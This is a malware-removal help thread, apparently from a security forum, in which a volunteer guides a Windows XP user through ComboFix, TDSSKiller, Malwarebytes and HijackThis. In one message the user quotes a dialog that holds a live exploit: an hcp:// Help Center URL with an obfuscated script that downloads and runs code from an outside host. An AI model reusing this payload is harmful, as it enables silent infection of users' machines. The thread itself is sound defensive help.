Hi there. I'm writing on the tail end of a windowsfixdisk infection after surfing in places I shouldn't have been. I have windows xp pro with its firewall active, and I have Avira as my AV program, but these still let the program through. I've since been using the removal guide on this site to get rid of that damn program, and I was successful in removing it.

However, for the parts of the guide that suggested to run RKill and TDSSKiller before using Malwarebyte's, neither program would run the way the guide said they would (i.e., no black box with progress for RKill, and either no response at all from TDSSKiller regardless of how it's renamed, or an application error dialog saying "The application failed to initialize properly (0xc0000005). Click on OK to terminate the program" when I rename it to IExplore.exe or Explorer.exe). I decided to just go ahead and run Malwarebyte's anyway, and it seems like it and Avira tag-teamed the infection to remove it.

So, everything seemed to be fine, until I started to use my computer again. Then I noticed that I'd get random audio ads playing in the background, my google search results would get redirected when I clicked them, my browser and computer seem to be lagging, and I get these Internet Explorer script error dialog boxes popping up with different advertising-based URLs such as "http://couponswapper.com/video/player/cheap_chick/all/1/?utm_source=adon_113320_150752_21983&utm_medium=cpc&utm_campaign=CouponsSwapper" every 2 minutes. I've tried running CCleaner and TFC, piecing together the advice from other people's problem threads that seemed similar to mine. Obviously, this hasn't panned out very well <_<

Thanks in advance for any and all help with this! I promise I won't do any more bull-in-china-shop action, honest. DDS and GMER logs attached/below:

Hello and Welcome to the forums!

My name is Gringo and I'll be glad to help you with your computer problems.

Somethings to remember while we are working together.

  • Do not run any other tool untill instructed to do so!
  • Please Do not Attach logs or put in code boxes.
  • Tell me about any problems that have occurred during the fix.
  • Tell me of any other symptoms you may be having as these can help also.
  • Do not run anything while running a fix.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

Click on the Watch Topic Button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.

In order for me to see the status of the infection I will need a new set of logs to start with.

Hi Gringo - thanks for helping me out!

As an update to what problems I'm experiencing, I haven't seen the Internet Explorer script error dialogs in the past few days (edit: I just rebooted my computer after re-enabling my CD drivers via Defogger and I just got the script errors again!), but I do get this Windows Internet Explorer dialog about every 30 seconds no matter if I have a browser open or not:

Posted Image

I've been clicking "Cancel", and the box goes away when I do, but once I move my cursor it pops back up. If I click "Cancel" to that second dialog box right away it doesn't reappear for a few minutes. I'm also still getting audio ads sometimes, I'm still getting redirected on google/bing searches consistently, and my browser/general computer responsiveness is less than usual.

I've run Defogger, DDS, and RKUnhooker again today, as you requested. There were no problems during the execution of these programs. Here are the logs:

Hello

I Would like you to do the following.

Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.

Run Combofix:

You may be asked to install or update the Recovery Console (Win XP Only) if this happens please allow it to do so (you will need to be connected to the internet for this)

Before you run Combofix I will need you to turn off any security software you have running, If you do not know how to do this you can find out >here< or >here<

Combofix may need to reboot your computer more than once to do its job this is normal.

You can download Combofix from one of these links. I want you to save it to the desktop and run it from there.
Link 1
Link 2
Link 3
1. Close any open browsers or any other programs that are open.
2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

Double click on combofix.exe & follow the prompts.
When finished, it will produce a report for you.

Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stall

Note 2: If you recieve an error "Illegal operation attempted on a registery key that has been marked for deletion." Please restart the computer

"information and logs"

  • In your next post I need the following
  • Log from Combofix
  • let me know of any problems you may have had
  • How is the computer doing now?

Hi Gringo,

I tried to run Combofix as you suggested (turned off Avira's guard first and didn't click on the ComboFix window), but some weird stuff happened when I ran it.

First, right after starting the program, a dialog popped up for just a second that said something along the lines of "volsnap.sys is patched with a rootkit" with an "OK" button. This disappeared on its own and the combofix window remained open. However, about 5 minutes later a Windows dialog popped up confirming that I wanted to open a program, which had a weird filename like ogapi.in.cc, a description along the lines of "windows help and support", and a location of:

"hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm?svr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,103,97,118,105,110,114,97,122,101,108,46,99,122,46,99,99,47,108,46,112,104,112,63,97,61,81,81,107,70,66,103,48,78,66,103,89,68,68,65,65,66,69,107,99,74,66,81,99,69,66,119,69,72,66,81,69,65,66,65,61,61,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</script>"

These types of windows popped up a few times, and I clicked "Cancel" each time. I also got the typical script error dialogs and the ones that I described in my reply earlier tonight. I left these at first, but it seemed like ComboFix wasn't progressing, so I canceled them all out when they popped up. Now it seems like ComboFix is stalled because it's a couple hours later and its window is still up. I tried closing it, but it won't budge.

I can reboot and try this again, but what do you suggest I do when these things start popping up? Is there a better way to run ComboFix so that it can run through without interference? If this is helpful, a "Catchme.log" file was created when ComboFix started, and here are the contents:

File "C:\WINDOWS\system32\drivers\volsnap.sys" added successfully
File list cleared

Thanks again for your help - I look forward to your reply!

I want you to run this tool for me next.

tdsskiller:

Please read carefully and follow these steps.
  • Download TDSSKiller and save it to your Desktop.
  • doubleclick on TDSSKiller.exe to run the application, then on Start Scan.
  • If an infected file is detected, the default action will be Cure, click on Continue.
  • If a suspicious file is detected, the default action will be Skip, click on Continue.
  • It may ask you to reboot the computer to complete the process. Click on Reboot Now.
  • If no reboot is require, click on Report. A log file should appear. Please copy and paste the contents of that file here.
  • If a reboot is required, the report can also be found in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the contents of that file here.

Hi Gringo,

As an update, I ended up having to reboot last night because the combofix window wouldn't close and wouldn't allow Windows to shut down. Also, before I rebooted, Avira started a scheduled virus scan and halted as it was scanning volsnap.sys. I clicked on "End" in its progress dialog and it, too, got stuck and wouldn't close.

I'm not sure which program prevented Windows from shutting down correctly, but I had to turn off my computer by holding the power button. When I booted back up, after logging into Windows I noticed that it took a long time (around 2 minutes once the desktop appeared) before any of my system tray icons (besides the volume icon) or desktop files appeared.

They eventually did, though, and I ran TDSSKiller like you requested. It was interesting to see that the program actually ran this time, as it wouldn't run no matter how I renamed it when I was trying to fix things before starting this thread. I left both "services and drivers" and "boot sectors" checked and clicked "start scan". There was one suspicious file found, which I skipped as you requested. Here are the report results:

Hello

Ok lets try this, I want you to run combofix in safe mode but it is very important that when combofix reboots the computer for you to direct it back into safe mode so it can finish the scan.

Boot into Safe Mode

Reboot your computer in Safe Mode.
  • If the computer is running, shut down Windows, and then turn off the power.
  • Wait 30 seconds, and then turn the computer on.
  • Start tapping the F8 key. The Windows Advanced Options Menu appears. If you begin tapping the F8 key too soon, some computers display a "keyboard error" message. To resolve this, restart the computer and try again.
  • Ensure that the Safe Mode option is selected.
  • Press Enter. The computer then begins to start in Safe mode.
  • Login on your usual account.

after combofix has finished its scan please post the report back here.

Hi Gringo,

I ran ComboFix in safe mode as you requested. The only issues I had with this were that I wasn't able to disable Avira because the system tray icon didn't appear for me to disable it. I tried opening the Avira console to disable it that way, but the guard status showed as "service stopped", and there was no option to disable it. So I just clicked "OK" to the ComboFix dialog telling me that my AV wasn't disabled, and it continued. Is this a problem?

The other issue I experienced was that ComboFix requested that I install the Windows Recovery Console, but because I was in safe mode it wasn't able to download it from the internet, so I clicked "No" when it asked if I wanted to install it.

The program seemed to run normally after this, and I actually saw it making progress and finishing with a log displayed. Here's the log:

Hello

that report looks good but I want to get the recovery console installed

try and run it in normal mode - it should go this time, if it don't then start in safe mode with networking and run it again

Hi Gringo,

I re-ran ComboFix in normal mode as you requested. Everything worked as expected, although the program did ask me if I wanted to update it when I started it and I clicked "No" as I'm still a little weary from fake messages disguised like that one :) I was able to install the recovery console and the program finished successfully. Here's the log:

Hello

:P2P Warning!:

IMPORTANT I notice there are signs of one or more P2P (Person to Person) File Sharing Programs on your computer.

Please note that as long as you are using any form of Peer-to-Peer networking and downloading files from non-documented sources, you can expect infestations of malware to occur
Once upon a time, P2P file sharing was fairly safe. That is no longer true. P2P programs form a direct conduit on to your computer, their security measures are easily circumvented and malware writers are increasingly exploiting them to spread their wares on to your computer. Further to that, if your P2P program is not configured correctly, your computer may be sharing more files than you realise. There have been cases where people's passwords, address books and other personal, private, and financial details have been exposed to a file sharing network by a badly configured program.

Please read these short reports on the dangers of peer-2-peer programs and file sharing.

These logs are looking alot better. But we still have some work to do.

Please print out these instructions, or copy them to a Notepad file. It will make it easier for you to follow the instructions and complete all of the necessary steps..
Clear your Java Cache

  • click on Start-> Control Panel (Classic View)-> Java (looks like a coffee cup)
    • On the General tab, under Temporary Internet Files, click the Settings button.
    • Next, click on the Delete Files button
    • There are two options in the window to clear the cache - Leave BOTH Checked
      Applications and Applets
      Trace and Log Files
  • Click OK on Delete Temporary Files Window
Note: This deletes ALL the Downloaded Applications and Applets from the CACHE.
  • Click OK to leave the Temporary Files Window
  • Click OK to leave the Java Control Panel.

TFC(Temp File Cleaner):

  • Please download TFC to your desktop,
  • Save any unsaved work. TFC will close all open application windows.
  • Double-click TFC.exe to run the program.
  • If prompted, click "Yes" to reboot.
Note: Save your work. TFC will automatically close any open programs, let it run uninterrupted. It shouldn't take longer take a couple of minutes, and may only take a few seconds. Only if needed will you be prompted to reboot.

: Malwarebytes' Anti-Malware :

  • I would like you to rerun MBAM
  • Double-click mbam icon
  • go to the update tab at the top
  • click on check for updates
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select Perform quick scan, then click Scan.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Be sure that everything is Checked (ticked) except items in the C:\System Volume Information folder and click on Remove Selected.
  • When completed, a log will open in Notepad. please copy and paste the log into your next reply
  • If you accidently close it, the log file is saved here and will be named like this:
  • C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\mbam-log-date (time).txt

Note: If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts.
Click OK to either and let MBAM proceed with the disinfection process.
If asked to restart the computer, please do so immediately. Failure to reboot will prevent MBAM from removing all the malware.

Download HijackThis

  • Go Here to download HijackThis Installer
  • Save HijackThis Installer to your desktop.
  • Double-click on the HijackThis Installer icon on your desktop. (Vista and Win 7 right click and run as admin)
  • By default it will install to C:\Program Files\Trend Micro\HijackThis .
  • Click on Install.
  • It will create a HijackThis icon on the desktop.
  • Once installed it will launch Hijackthis.
  • Click on the Do a system scan and save a logfile button. It will scan and the log should open in notepad.
  • Click on Edit > Select All then click on Edit > Copy to copy the entire contents of the log.
  • Come back here to this thread and Paste the log in your next reply.
  • DO NOT use the AnalyseThis button its findings are dangerous if misinterpreted.
  • DO NOT have Hijackthis fix anything yet. Most of what it finds will be harmless or even required.

"information and logs"

  • In your next post I need the following

  • Log From MBAM
  • report from Hijackthis
  • let me know of any problems you may have had
  • How is the computer doing now?

Greetings

These logs are looking very good, we are almost done!!! Just one more scan to go.

:Remove unneeded startup entries:

This part of the fix is purely optional
These are programs that start up when you turn on your computer but don't need to be, any of these programs you can click on their icons (or start from the control panel) and start the program when you need it. By stopping these programs you will boot up faster and your computer will work faster.

  • Run HijackThis
  • Click on the Scan button
  • Put a check beside all of the items listed below (if present):

Hi Gringo,

I ran the online ESET scanner as you requested. It reached 100% on the progress bar but never said it was finished (seemed to stick at "Target: Operating Memory" indefinitely). I clicked "Stop" and then it went to the "Step 4 of 4: Finished" window anyway, so maybe it just needed a kick in the pants! Here's the log pulled from c:\prog files\eset...\log.txt:
